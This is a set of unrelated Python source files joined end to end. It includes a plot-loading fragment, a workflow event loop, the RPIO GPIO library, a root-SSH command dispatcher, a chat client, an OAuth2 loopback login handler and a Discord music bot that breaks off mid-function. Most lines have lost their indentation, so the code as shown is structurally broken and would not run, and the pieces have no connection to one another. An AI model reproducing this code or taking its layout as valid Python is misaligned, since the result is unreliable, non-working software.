expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
                    # Only use plots that have the correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
            # First drop all plots we have in plot_filename_paths but that are no longer in the filesystem or set in config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
with self.plot_filename_paths_lock:
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
mainloop.py
|
import asyncio
from asyncio import events
from flask import Flask
from importlib import import_module
import json
from logging import basicConfig, INFO, info, DEBUG, debug
from os import listdir
import strictyaml
from sys import platform
from time import sleep
from threading import Thread
from queue import SimpleQueue
import core
basicConfig(level=INFO, format='%(levelname)-8s %(message)s')
config_path = "data/config.json"
workflows_path = "data/workflows"
triggers_path = "data/triggers"
debug(platform)
with open(config_path) as json_data_file:
core.config = json.load(json_data_file)
if platform == "win32":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
core.event_queue = SimpleQueue()
info("loading plugins")
import_module("plugins.basic")
import_module("plugins.cricbuzz")
import_module("plugins.xmppservice")
info("plugins loaded")
def remove_ext(filename):
return filename[:-4]
info("loading workflows")
for filename in listdir(workflows_path):
if filename.endswith(".yml"):
file_path = f"{workflows_path}/{filename}"
with open(file_path, 'r') as f:
wf = strictyaml.load(f.read()).data
name = remove_ext(filename)
core.add_workflow(name, wf)
info("workflows loaded")
info("loading triggers")
for filename in listdir(triggers_path):
if filename.endswith(".yml"):
file_path = f"{triggers_path}/{filename}"
with open(file_path, 'r') as f:
tr = strictyaml.load(f.read()).data
core.add_trigger(tr)
info("triggers loaded")
info("available actions")
info(core.actions.keys())
info("available eventfilters")
info(core.triggerfliters.keys())
info("available services")
info(core.services.keys())
info("available workflows")
info(core.workflows.keys())
#info("available triggers")
#info(core.triggers)
def process_event(e):
filtered_triggers = filter(lambda c: c["trigger"] == e[0], core.triggers)
for trigger in filtered_triggers:
if core.triggerfliters[e[0]](e[1], trigger["params"]):
core.start_workflow(trigger['workflow'], trigger["params"])
            info(trigger['workflow'] + " started")
info("(" + e[0] + "," +e[1] + ") processed ")
while True:
try:
while not core.event_queue.empty():
e = core.event_queue.get()
debug(e)
t = Thread(target=process_event,args=(e,))
t.start()
except KeyboardInterrupt:
break
sleep(1)
# app = Flask("pibot")
# @app.route('/')
# def index():
# return "pibot"
# app.run(port=8080)
|
__init__.py
|
# -*- coding: utf-8 -*-
#
# This file is part of RPIO.
#
# Copyright
#
# Copyright (C) 2013 Chris Hager <chris@linuxuser.at>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://pythonhosted.org/RPIO
#
"""
RPIO extends RPi.GPIO with GPIO interrupts, TCP socket interrupts and more.
Example of how to listen for interrupts with RPIO:
import RPIO
def gpio_callback(gpio_id, val):
print("gpio %s: %s" % (gpio_id, val))
def socket_callback(socket, val):
print("socket %s: '%s'" % (socket.fileno(), val))
socket.send("echo: %s" % val)
# Three GPIO interrupt callbacks
RPIO.add_interrupt_callback(7, gpio_callback)
RPIO.add_interrupt_callback(9, gpio_callback, pull_up_down=RPIO.PUD_UP)
# One TCP socket server callback on port 8080
RPIO.add_tcp_callback(8080, socket_callback)
# Start the blocking epoll loop (exit with Ctrl+C)
RPIO.wait_for_interrupts()
You can add the argument `threaded=True` to `wait_for_interrupts(..)` in order
to run it in a thread. RPIO will automatically shutdown everything nicely when
your script exits.
GPIO interrupts can have optional `edge` and `pull_up_down` parameters (default
edge is `both` and default pull_up_down is `RPIO.PUD_OFF`).
If you want to receive a callback inside a Thread (which won't block anything
else on the system), set `threaded_callback` to True when adding an interrupt-
callback. Here is an example:
RPIO.add_interrupt_callback(7, do_something, threaded_callback=True)
RPIO.add_tcp_callback(8080, socket_callback, threaded_callback=True)
To debounce GPIO interrupts, you can add the argument ``debounce_timeout_ms``
to the ``add_interrupt_callback(..)`` call:
RPIO.add_interrupt_callback(7, do_something, debounce_timeout_ms=100)
To stop the `wait_for_interrupts()` loop, call
`RPIO.stop_waiting_for_interrupts()`. To remove all callbacks from a certain
gpio pin, use `RPIO.del_interrupt_callback(gpio_id)`.
Besides the interrupt handling, you can use RPIO just as RPi.GPIO:
import RPIO
# set up input channel without pull-up
RPIO.setup(7, RPIO.IN)
# set up input channel with pull-up control. Can be
# PUD_UP, PUD_DOWN or PUD_OFF (default)
RPIO.setup(7, RPIO.IN, pull_up_down=RPIO.PUD_UP)
# read input from gpio 7
input_value = RPIO.input(7)
# set up GPIO output channel
RPIO.setup(8, RPIO.OUT)
# set gpio 8 to high
RPIO.output(8, True)
# set up output channel with an initial state
RPIO.setup(8, RPIO.OUT, initial=RPIO.LOW)
# change to BOARD numbering schema
RPIO.setmode(RPIO.BOARD)
# set software pullup on channel 17
RPIO.set_pullupdn(17, RPIO.PUD_UP)
# reset every channel that has been set up by this program,
# and unexport interrupt gpio interfaces
RPIO.cleanup()
You can use RPIO as a drop-in replacement for RPi.GPIO in your existing code:
import RPIO as GPIO # (if you've used `import RPi.GPIO as GPIO`)
Author: Chris Hager <chris@linuxuser.at>
URL: https://github.com/metachris/RPIO
License: LGPLv3+
"""
from threading import Thread
import RPIO._GPIO as _GPIO
from RPIO._RPIO import Interruptor
VERSION = "0.10.1"
# Exposing constants from RPi.GPIO
VERSION_GPIO = _GPIO.VERSION_GPIO
RPI_REVISION = _GPIO.RPI_REVISION
RPI_REVISION_HEX = _GPIO.RPI_REVISION_HEX
HIGH = _GPIO.HIGH
LOW = _GPIO.LOW
OUT = _GPIO.OUT
IN = _GPIO.IN
ALT0 = _GPIO.ALT0
BOARD = _GPIO.BOARD
BCM = _GPIO.BCM
PUD_OFF = _GPIO.PUD_OFF
PUD_UP = _GPIO.PUD_UP
PUD_DOWN = _GPIO.PUD_DOWN
# Exposing methods from RPi.GPIO
setup = _GPIO.setup
output = _GPIO.output
input = _GPIO.input
setmode = _GPIO.setmode
forceoutput = _GPIO.forceoutput
forceinput = _GPIO.forceinput
set_pullupdn = _GPIO.set_pullupdn
gpio_function = _GPIO.gpio_function
channel_to_gpio = _GPIO.channel_to_gpio
# BCM numbering mode by default
_GPIO.setmode(BCM)
MODEL_DATA = {
'2': ('B', '1.0', 256, '?'),
'3': ('B', '1.0', 256, '?'),
'4': ('B', '2.0', 256, 'Sony'),
'5': ('B', '2.0', 256, 'Qisda'),
'6': ('B', '2.0', 256, 'Egoman'),
'7': ('A', '2.0', 256, 'Egoman'),
'8': ('A', '2.0', 256, 'Sony'),
'9': ('A', '2.0', 256, 'Qisda'),
'd': ('B', '2.0', 512, 'Egoman'),
'e': ('B', '2.0', 512, 'Sony'),
'f': ('B', '2.0', 512, 'Qisda')
}
# List of valid bcm gpio ids for raspberry rev1 and rev2. Used for inspect-all.
GPIO_LIST_R1 = (0, 1, 4, 7, 8, 9, 10, 11, 14, 15, 17, 18, 21, 22, 23, 24, 25)
GPIO_LIST_R2 = (2, 3, 4, 7, 8, 9, 10, 11, 14, 15, 17, 18, 22, 23, 24, 25, \
27, 28, 29, 30, 31)
# List of board pins with extra information which board header they belong to.
# Revision 2 boards have extra gpios on the P5 header (gpio 27-31). Shifting
# the header info left by 8 bits leaves 255 possible channels per header. This
# list of board pins is currently only used for testing purposes.
HEADER_P5 = 5 << 8
PIN_LIST = (3, 5, 7, 8, 10, 11, 12, 13, 15, 16, 18, 19, 21, 22, 23, 24, 26, \
3 | HEADER_P5, 4 | HEADER_P5, 5 | HEADER_P5, 6 | HEADER_P5)
# _rpio is the interrupt handling wrapper object
_rpio = Interruptor()
def sysinfo():
""" Returns (model, revision, mb-ram, maker) for this raspberry """
return (RPI_REVISION_HEX,) + MODEL_DATA[RPI_REVISION_HEX.lstrip("0")]
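# For example, with a revision hex of '000e' sysinfo() would return
# ('000e', 'B', '2.0', 512, 'Sony') per MODEL_DATA above (the leading-zero form of the
# revision string is an assumption; only the stripped value is used for the lookup).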
def version():
""" Returns a tuple of (VERSION, VERSION_GPIO) """
return (VERSION, VERSION_GPIO)
def add_tcp_callback(port, callback, threaded_callback=False):
"""
Adds a unix socket server callback, which will be invoked when values
arrive from a connected socket client. The callback must accept two
parameters, eg. ``def callback(socket, msg)``.
"""
_rpio.add_tcp_callback(port, callback, threaded_callback)
def add_interrupt_callback(gpio_id, callback, edge='both', \
pull_up_down=PUD_OFF, threaded_callback=False, \
debounce_timeout_ms=None):
"""
Add a callback to be executed when the value on 'gpio_id' changes to
the edge specified via the 'edge' parameter (default='both').
`pull_up_down` can be set to `RPIO.PUD_UP`, `RPIO.PUD_DOWN`, and
`RPIO.PUD_OFF`.
If `threaded_callback` is True, the callback will be started
inside a Thread.
If debounce_timeout_ms is set, new interrupts will not be forwarded
until after the specified amount of milliseconds.
"""
_rpio.add_interrupt_callback(gpio_id, callback, edge, pull_up_down, \
threaded_callback, debounce_timeout_ms)
def del_interrupt_callback(gpio_id):
""" Delete all interrupt callbacks from a certain gpio """
_rpio.del_interrupt_callback(gpio_id)
def close_tcp_client(fileno):
""" Closes TCP connection to a client and removes client from epoll """
_rpio.close_tcp_client(fileno)
def wait_for_interrupts(threaded=False, epoll_timeout=1):
"""
Blocking loop to listen for GPIO interrupts and distribute them to
associated callbacks. epoll_timeout is an easy way to shutdown the
blocking function. Per default the timeout is set to 1 second; if
`_is_waiting_for_interrupts` is set to False the loop will exit.
If an exception occurs while waiting for interrupts, the interrupt
gpio interfaces will be cleaned up (/sys/class/gpio unexports). In
this case all interrupts will be reset and you'd need to add the
callbacks again before using `wait_for_interrupts(..)` again.
If the argument `threaded` is True, wait_for_interrupts will be
started in a daemon Thread. To quit it, call
`RPIO.stop_waiting_for_interrupts()`.
"""
if threaded:
t = Thread(target=_rpio.wait_for_interrupts, args=(epoll_timeout,))
t.daemon = True
t.start()
else:
_rpio.wait_for_interrupts(epoll_timeout)
def stop_waiting_for_interrupts():
"""
Ends the blocking `wait_for_interrupts()` loop the next time it can,
    which depends on the `epoll_timeout` (by default it's 1 second).
"""
_rpio.stop_waiting_for_interrupts()
def cleanup_interrupts():
"""
Removes all callbacks and closes used GPIO interfaces and sockets. After
this you'll need to re-add the interrupt callbacks before waiting for
interrupts again. Since RPIO v0.10.1 this is done automatically on exit.
"""
_rpio.cleanup_interrupts()
def cleanup():
"""
Clean up by resetting all GPIO channels that have been used by this
program to INPUT with no pullup/pulldown and no event detection. Also
unexports the interrupt interfaces and callback bindings. You'll need
to add the interrupt callbacks again before waiting for interrupts again.
"""
cleanup_interrupts()
_GPIO.cleanup()
def setwarnings(enabled=True):
""" Show warnings (either `True` or `False`) """
_GPIO.setwarnings(enabled)
_rpio._show_warnings = enabled
|
threaded_dispatch.py
|
#!/usr/bin/env python
import subprocess
import configparser
from threading import Thread
from queue import Queue
import time
"""
A threaded ssh based command dispatch system
"""
start = time.time()
queue = Queue()
def readConfig(file="config.ini"):
"""Extract IP addresses and CMDS from config file and returns tuple"""
ips = []
cmds = []
Config = configparser.ConfigParser()
Config.read(file)
machines = Config.items("MACHINES")
commands = Config.items("COMMANDS")
for ip in machines:
ips.append(ip[1])
for cmd in commands:
cmds.append(cmd[1])
return ips, cmds
def launcher(i,q, cmd):
"""Spawns command in a thread to an ip"""
while True:
#grabs ip, cmd from queue
ip = q.get()
print("Thread %s: Running %s to %s" % (i, cmd, ip))
subprocess.call("ssh root@%s %s" % (ip, cmd), shell=True)
q.task_done()
#grab ips and cmds from config
ips, cmds = readConfig()
#Determine Number of threads to use, but max out at 25
if len(ips) < 25:
num_threads = len(ips)
else:
num_threads = 25
#Start thread pool
for i in range(num_threads):
for cmd in cmds:
worker = Thread(target=launcher, args=(i, queue,cmd))
        worker.daemon = True
worker.start()
print("Main Thread Waiting")
for ip in ips:
queue.put(ip)
queue.join()
end = time.time()
print("Dispatch Completed in %s seconds" % float(end - start))
|
client.py
|
import socket
from threading import Thread
from queue import *
from message import *
class Client:
def __init__(self, username, socket, address):
self.address = address
self.username = username
self.socket = socket
self.awaiting_messages = Queue()
self.running = True
def start(self, users):
self.running = True
self.thread = Thread(target = self.receive, args=(users,))
self.thread.start()
def receive(self, users):
while self.running:
try:
data = self.socket.recv(4096).decode()
msg = fromStr(data)
if "SERVER" in msg.recipients and msg.data == "QUIT":
print("[INFO]: Client", msg.sender,"disconnected")
self.running = False
break
print("Received a new message from ", msg.sender, "to", msg.recipients, ": (", msg.time, ")", msg.data)
# If no recipient specified, send to all
if msg.recipients == set(['']):
for key in users:
if key != self.username.upper():
users[key].awaiting_messages.put(msg)
# Handle messages for server exclusively
elif msg.recipients == set(['SERVER']):
if(msg.data == "LIST"):
print("[INFO]:", msg.sender, "requested the list of user")
answer = ">>"
for i in users.values():
answer += "->" + i.username
self.awaiting_messages.put(Message("SERVER",[self.username], answer))
# Handle messages with specific recipient
else:
for recip in msg.recipients:
if recip.upper() in users:
users[recip.upper()].awaiting_messages.put(msg)
except Exception as e:
print(e)
print("Connection to", self.username, "has been lost")
self.running = False
break
def sendAwaiting(self):
if not self.awaiting_messages.empty():
self.socket.send(self.awaiting_messages.get().serialize().encode())
#print("[INFO]: Message transmitted to", self.username)
|
oauth_handler.py
|
#
# Copyright 2019 EPAM Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
OAuth2 handler
"""
import base64
import socket
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from contextlib import closing
from urllib.parse import parse_qs, urlparse
import typing
import json
import requests
from odahuflow.sdk import config
from odahuflow.sdk.utils import render_template
LOGGER = logging.getLogger()
SA_SCOPE = 'openid profile offline_access groups'
class OAuthLoginResult(typing.NamedTuple):
"""
Result of oauth login process
"""
access_token: str
refresh_token: str
id_token: str
issuing_url: str
user_email: str
user_name: str
def find_free_port(bind_addr: str = '0.0.0.0') -> int:
"""
Find next available port on local machine
:return: int - port number
"""
# pylint: disable=E1101
# due to bug with closing return type
LOGGER.debug('Trying to get free port')
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.bind((bind_addr, 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = sock.getsockname()[1]
LOGGER.debug('Free port %d has been found', port)
return port
def _try_to_extract_issuing_url_from_well_known_metadata(well_known_address: str) -> typing.Optional[str]:
"""
Try to extract token issuing url from well-known location
:param well_known_address: well-known URL
:type well_known_address: str
:return: str or None -- token issuing URL
"""
try:
LOGGER.debug('Trying to extract well-known information from address %r', well_known_address)
response = requests.get(url=well_known_address)
data = response.json()
except requests.HTTPError as http_error:
LOGGER.debug('Failed to extract well-known information from address %r - %s', well_known_address, http_error)
return None
except ValueError as value_error:
LOGGER.debug('Failed to parse well-known information from address %r - %s', well_known_address, value_error)
return None
token_endpoint = data.get('token_endpoint')
if not token_endpoint:
LOGGER.debug('well-known information does not contain token_endpoint (%s)', well_known_address)
        return None
return token_endpoint
def get_oauth_token_issuer_url(redirect_url: str) -> typing.Optional[str]:
"""
Get OAuth2 token issuing URL
:param redirect_url: current redirection URL
:type redirect_url: str
:return: str or None -- token issuing URL
"""
# 1st priority - check config variable ODAHUFLOWCTL_OAUTH_TOKEN_ISSUING_URL
if config.ODAHUFLOWCTL_OAUTH_TOKEN_ISSUING_URL:
return config.ODAHUFLOWCTL_OAUTH_TOKEN_ISSUING_URL
# 2nd priority - try to remove URL parts of redirect URL and append /.well-known/openid-configuration
# According to https://tools.ietf.org/pdf/rfc8414.pdf
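    # Illustrative walk, assuming a hypothetical redirect URL of
    # "https://odahu.example.com/a/b/callback": the loop below probes, in order,
    #   https://odahu.example.com//.well-known/openid-configuration
    #   https://odahu.example.com/a/.well-known/openid-configuration
    #   https://odahu.example.com/a/b/.well-known/openid-configuration
    # and returns the first token_endpoint advertised by any of them.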
loc = urlparse(redirect_url)
path_parts = loc.path.strip('/').split('/')
for i in range(len(path_parts)):
sub_path = '/'.join(path_parts[0:i])
full_uri = f'{loc.scheme}://{loc.netloc}/{sub_path}/.well-known/openid-configuration'
endpoint = _try_to_extract_issuing_url_from_well_known_metadata(full_uri)
if endpoint:
return endpoint
return None
def _ask_token_endpoint(url: str, payload: typing.Any) -> typing.Optional[OAuthLoginResult]:
"""
Query token endpoint to refresh / issue new token
:param url: token endpoint
:param payload: query payload
:return: OAuthLoginResult or None -- login result or None
"""
try:
res = requests.post(url, data=payload)
data = res.json()
except (ValueError, requests.HTTPError) as error:
LOGGER.warning('Failed to get ID token on %r - %s', url, error)
return None
access_token, refresh_token, id_token = data.get('access_token'), data.get('refresh_token'), data.get('id_token')
if not access_token or not refresh_token or not id_token:
LOGGER.warning('Response does not contain access_token / refresh_token / id_token')
return None
_, body, _ = id_token.split('.')
id_payload = json.loads(base64.b64decode(body + '===').decode('utf-8'))
user_name = id_payload.get('name')
user_email = id_payload.get('email')
result = OAuthLoginResult(
access_token=access_token,
refresh_token=refresh_token,
id_token=id_token,
issuing_url=url,
user_name=user_name,
user_email=user_email
)
LOGGER.debug('Token information for %s / %s has been received', result.user_name, result.user_email)
return result
def do_refresh_token(refresh_token: str, issue_token_url: str) -> typing.Optional[OAuthLoginResult]:
"""
Refresh token using previously saved refresh_token
:param refresh_token: refresh token
:param issue_token_url: issue token URL
:return: OAuthLoginResult or None -- refresh result or None
"""
LOGGER.debug('Trying to refresh ID token using %s', issue_token_url)
payload = {
'grant_type': 'refresh_token',
'client_id': config.ODAHUFLOWCTL_OAUTH_CLIENT_ID,
'client_secret': config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET,
'refresh_token': refresh_token
}
return _ask_token_endpoint(issue_token_url, payload)
def do_client_cred_authentication(
client_id: str = config.ODAHUFLOWCTL_OAUTH_CLIENT_ID,
client_secret: str = config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET,
issue_token_url: str = config.API_ISSUING_URL
):
"""
Get access and id token using oauth2 client credentials flow
:param client_id:
:param client_secret:
:param issue_token_url:
:return:
"""
LOGGER.debug('Trying to get ID token via Client Credentials Flow using %s', issue_token_url)
payload = {
'grant_type': 'client_credentials',
'client_id': client_id,
'client_secret': client_secret,
'scope': SA_SCOPE
}
return _ask_token_endpoint(issue_token_url, payload)
def get_id_token(code: str, issue_token_url: str, redirect_uri: str) -> typing.Optional[OAuthLoginResult]:
"""
Get ID token and validate received data
:param code: code
:param issue_token_url: issuing URL
:param redirect_uri: redirect URL
:return: OAuthLoginResult or None -- login result or None
"""
LOGGER.debug('Trying to get ID token and validate using %s', issue_token_url)
payload = {
'grant_type': 'authorization_code',
'client_id': config.ODAHUFLOWCTL_OAUTH_CLIENT_ID,
'code': code,
'redirect_uri': redirect_uri
}
if config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET:
payload['client_secret'] = config.ODAHUFLOWCTL_OAUTH_CLIENT_SECRET
return _ask_token_endpoint(issue_token_url, payload)
class OAuth2Handler(BaseHTTPRequestHandler):
"""
Handler for simple loopback listening server that handles OAuth2 redirects to loopback host
"""
def __init__(self, *args, on_token_received=None, state=None, target_url=None, redirect_url=None, **kwargs):
"""
Initialize loopback server
:param args: system args
:param on_token_received: callback that should be called on final auth. stage (when all tokens are received)
:param state: randomly generated token for OAuth2 pipeline
:param target_url: captured redirect to IP's URL
:param redirect_url: redirect URL to continue authorization
:param kwargs: system args
"""
self.on_token_received = on_token_received
self.state = state
self.target_url = target_url
self.redirect_url = redirect_url
BaseHTTPRequestHandler.__init__(self, *args)
def log_message(self, format: str, *args: typing.Tuple[typing.Any, ...]) -> None: # pylint: disable=W0622
"""
Log an arbitrary message.
The first argument, FORMAT, is a format string for the
message to be logged. If the format string contains
any % escapes requiring parameters, they should be
specified as subsequent arguments (it's just like
printf!).
:param format: format
:param args: arguments for format
:return: None
"""
LOGGER.debug('%s - %s', self.address_string(), format % args)
def raise_error(self, message: str) -> None:
"""
Raise error if it is a problem
:param message: error description
:type message: str
:return: None
"""
self.send_response(500)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(message.encode('utf-8'))
def do_GET(self) -> None:
"""
Handle GET action
:return: None
"""
loc = urlparse(self.path)
if loc.path == config.ODAHUFLOWCTL_OAUTH_LOOPBACK_URL:
params = parse_qs(loc.query)
if 'state' not in params or len(params['state']) != 1:
return self.raise_error('state is missed')
if 'code' not in params or len(params['code']) != 1:
return self.raise_error('code is missed')
state = params['state'][0]
code = params['code'][0]
if state != self.state:
return self.raise_error(f'Wrong state. Received {state!r}, expected {self.state!r}')
issue_token_url = get_oauth_token_issuer_url(self.target_url)
if not issue_token_url:
return self.raise_error(f'Can not get URL for issuing long-life token from {self.target_url}')
login_result = get_id_token(code, issue_token_url, self.redirect_url)
if not login_result:
return self.raise_error(f'Failed to get long-life token from {issue_token_url}')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
content = render_template('callback-response.html', {})
self.wfile.write(content.encode('utf-8'))
self.on_token_received(login_result)
else:
self.send_response(404)
self.end_headers()
def handler_builder(on_token_received: typing.Callable[[OAuthLoginResult], None],
state: str, target_url: str, redirect_url: str) -> typing.Callable:
"""
Create handler builder for OAuth2 callback built-in server
:param on_token_received: callback that should be called on final auth. stage (when all tokens are received)
:param state: randomly generated token for OAuth2 pipeline
:param target_url: captured redirect to IP's URL
:param redirect_url: redirect URL to continue authorization
:return: callable - handler builder function
"""
def init(*args, **kwargs) -> object:
"""
Builder (builds OAuth2Handler instance)
:param args: system args
:param kwargs: system args
:return: object -- handler
"""
        return OAuth2Handler(*args,
                             on_token_received=on_token_received,
                             state=state,
                             target_url=target_url,
                             redirect_url=redirect_url,
                             **kwargs)
return init
def start_oauth2_callback_handler(on_token_received: typing.Callable[[OAuthLoginResult], None],
state: str, target_url: str) -> str:
"""
Start OAuth2 callback handler
:param on_token_received: callback that should be called on final auth. stage (when all tokens are received)
:param state: randomly generated token for OAuth2 pipeline
:param target_url: captured redirect to IP's URL
:return: str -- redirect URL to continue authorization
"""
host = config.ODAHUFLOWCTL_OAUTH_LOOPBACK_HOST
port = find_free_port(host)
redirect_url = f'http://{config.ODAHUFLOWCTL_OAUTH_LOOPBACK_HOST}:{port}{config.ODAHUFLOWCTL_OAUTH_LOOPBACK_URL}'
server = HTTPServer((host, port),
handler_builder(on_token_received, state, target_url, redirect_url))
callback_handler = Thread(name='oauth2_callback_handler',
target=server.serve_forever)
callback_handler.start()
return redirect_url
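# A minimal usage sketch (hypothetical caller: the state generation, callback and authorize
# URL below are assumptions about the surrounding login command, not part of this module):
#
#   import secrets
#   import webbrowser
#
#   def on_tokens(result: OAuthLoginResult):
#       print('Logged in as', result.user_name, result.user_email)
#
#   state = secrets.token_urlsafe(16)
#   redirect_url = start_oauth2_callback_handler(on_tokens, state,
#                                                target_url='https://odahu.example.com/')
#   webbrowser.open(f'{authorize_endpoint}?response_type=code&client_id={client_id}'
#                   f'&scope=openid&state={state}&redirect_uri={redirect_url}')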
|
main.py
|
# coding=utf-8
import asyncio
import datetime
import html
import os
import re
import threading
import time
import discord
import requests
from .configparser import ConfigParser
from .nsen import Nsen
from .utils import getCustomLogger
class Bot:
def __init__(self):
self.running = False
if not discord.opus.is_loaded():
discord.opus.load_opus("opus")
self.config = ConfigParser().config
self.isDebugMode = self.config.get("debug", False)
self.logger = getCustomLogger("{}/{}.log".format(self.config["logDir"], datetime.datetime.now().strftime("%Y%m%d_%H%M%S")), self.isDebugMode)
self.client = discord.Client()
self.voiceClient = None
self.player = None
self._playing = True
self._volume = self.config["bot"]["volume"]
self.nsenChannel = self.config["niconico"]["default"]
self.voiceChannel = discord.Object(id=self.config["bot"]["channel"])
self.textChannel = discord.Object(id=self.config["bot"]["textChannel"])
self.prefix = self.config["bot"]["prefix"]
self.nsenThread = threading.Thread(name="Sync Nsen Song", target=self.syncNsen)
self.nsenThread.setDaemon(True)
self.musicQueue = []
self.currentVote = []
self.needVotes = self.config["bot"]["needVotes"]
self.currentVideoPath = None
self.nsen = Nsen()
self.nsen.login(self.config["niconico"]["email"], self.config["niconico"]["password"])
self.nsen.setChannel(self.nsenChannel)
self.nsenIcon = "{}/nsen.png".format(self.config["tmpDir"])
self.tmpDir = self.config["tmpDir"]
self.cleanUpInterval = self.config["bot"]["cleanUpInterval"]
self.cleanUpThread = threading.Thread(name="Cleaning Up Tmp Dir", target=self.cleanUpTmpDir)
self.reloginThread = threading.Thread(name="Re-Logging In Dir", target=self.loginNsen)
@self.client.event
async def on_ready():
self.logger.info("Logged in as: {0} (ID: {0.id})".format(self.client.user))
if "nsen" not in [x.name for x in self.client.get_all_emojis()]:
await self.client.create_custom_emoji(self.client.servers[0], "nsen", open(self.nsenIcon, "rb").read())
self.voiceClient = await self.client.join_voice_channel(self.voiceChannel)
await self.loopTrack()
@self.client.event
async def on_voice_state_update(before, after):
if before.voice.voice_channel == after.voice.voice_channel:
return
if self.voiceChannel == after.voice.voice_channel:
await self.client.send_message(self.textChannel, "{}さん `Nsen`チャンネルへようこそ\n`/help`コマンドでヘルプを表示できます。".format(after.mention))
if len(after.voice.voice_channel.voice_members) == 1:
self.playing = True
elif self.voiceChannel == before.voice.voice_channel:
self.playing = False
@self.client.event
async def on_message(message):
if message.author == self.client.user:
return
def getRegex(command, content):
m = re.match("^.{} (.+)$".format(command), content)
return m.group(1) if m else None
